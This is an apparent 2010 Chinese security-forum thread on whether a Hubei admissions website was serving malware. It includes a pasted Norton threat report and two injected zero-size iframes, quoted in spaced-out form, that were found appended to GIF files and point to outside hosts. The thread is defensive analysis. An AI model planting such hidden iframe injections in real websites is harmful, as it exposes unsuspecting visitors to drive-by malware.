湖北招生信息网被挂毒!!!!（未挂马　检测：cchao21）

显示全部楼层 · 发表于 2010-6-13 14:01:34

[i=s] 本帖最后由 zhiyan 于 2010-6-14 10:06 编辑 [/i]

今天进入湖北招生信息网www.e21.edu.cn,诺顿2010安全特警立刻报警提示有病毒!!!
这是诺顿检查的结果:http://siterating.norton.com/report/show?url=e21.cn

显示全部楼层 · 发表于 2010-6-13 15:21:00

未发现挂马

显示全部楼层 · 发表于 2010-6-14 10:05:25

这是诺顿安全特警检测的结果!

-----------------------------------------
威胁报告
已发现威胁总数: 100

  偷渡式下载 (这是什么?)
已发现威胁: 53
这是示例:

威胁名称:  HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn//head.asp

威胁名称:  HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn/list.asp?Unid=598

威胁名称:  HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn/copy.asp

威胁名称:  HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn/gd.htm

威胁名称:  HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn//list.asp?Unid=625

威胁名称:  HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn//ly/

直接链接到:  http://wlschool.jm.e21.cn//2j.asp?id=118&cid=135
位置:  http://wlschool.jm.e21.cn//2j.asp?id=119

威胁名称:  直接链接到 HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn//list.asp?Unid=624

威胁名称:  直接链接到 HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn/list.asp?unid=541

威胁名称:  直接链接到 HTTP Malicious Iframe Image Request
位置:  http://wlschool.jm.e21.cn/list.asp?unid=625

  病毒 (这是什么?)
已发现威胁: 47
这是示例:

威胁名称:  Bloodhound.Exploit.281
位置:

威胁名称:  Bloodhound.Exploit.281
位置:

显示全部楼层 · 发表于 2010-6-14 10:26:35

呵呵 iframe写在gif末尾的，不过那个是无效的挂马

有图有真相不过卡饭现在上传不了附件……

这个是加在gif末尾的两个iframe：
<i f r a m e s r c = h t t p : / / w w w . t c g e d u . c o m / 藏版 0 0 1 变种 . h t m l w i d t h=0 height=0></iframe>
< i f r a me s rc = h t t p :/ / x x. k o 5 1 . c o m / in d e x . h t m w i d t h = 5 0 h e i g h t = 0 >< / i f r a m e>

两个都无法访问，而且之前我有过测试，这种gif frame是无法加载的（至少在ie7中）

显示全部楼层 · 发表于 2010-6-14 12:45:54

诺顿发现挂马

[已鉴定] 湖北招生信息网被挂毒!!!!（未挂马　检测：cchao21）

浏览过的版块

[已鉴定] 湖北招生信息网被挂毒!!!!（未挂马 检测：cchao21）

浏览过的版块

[已鉴定] 湖北招生信息网被挂毒!!!!（未挂马　检测：cchao21）